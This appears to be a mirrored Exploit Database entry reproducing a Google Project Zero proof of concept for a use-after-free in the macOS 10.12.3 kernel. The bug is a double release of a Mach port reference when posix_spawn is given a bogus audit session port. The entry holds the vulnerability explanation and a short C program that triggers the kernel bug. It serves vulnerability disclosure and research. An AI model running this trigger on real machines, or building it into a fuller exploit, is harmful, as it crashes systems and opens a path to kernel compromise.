Apple macOS Kernel 10.12.3 (16D32) – Use-After-Free Due to Double-Release in posix_spawn

Exploit Database
116 阅读

作者： Google Security Research

日期： 2017-04-04
类别：
- dos
平台：
- macos
来源：https://www.exploit-db.com/exploits/41791/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

/*

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1104

exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn.

It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS)

For the special, exception and audit ports it tries to update the new task to reflect the port action

by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if

any of those calls fail it calls ipc_port_release_send(port).

task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail

but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on

the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't

an audit session port.

This means we can cause two references to be dropped on the port when only one is held leading to a

use after free in the kernel.

Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2

*/

// ianbeer

#if 0

MacOS/iOS kernel uaf due to double-release in posix_spawn

exec_handle_port_actions is responsible for handling the xnu port actions extension to posix_spawn.

It supports 4 different types of port (PSPA_SPECIAL, PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS)

For the special, exception and audit ports it tries to update the new task to reflect the port action

by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if

any of those calls fail it calls ipc_port_release_send(port).

task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail

but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on

the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't

an audit session port.

This means we can cause two references to be dropped on the port when only one is held leading to a

use after free in the kernel.

Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2

#endif

#include <stdio.h>

#include <stdlib.h>

#include <spawn.h>

#include <mach/mach.h>

int main() {

mach_port_t p = MACH_PORT_NULL;

mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p);

mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);

posix_spawnattr_t attrs;

posix_spawnattr_init(&attrs);

posix_spawnattr_setauditsessionport_np(&attrs,p);

char* _argv[] = {"/usr/bin/id", NULL};

int child_pid = 0;

int spawn_err = posix_spawn(&child_pid,

"/usr/bin/id",

NULL, // file actions

&attrs,

_argv,

NULL);

}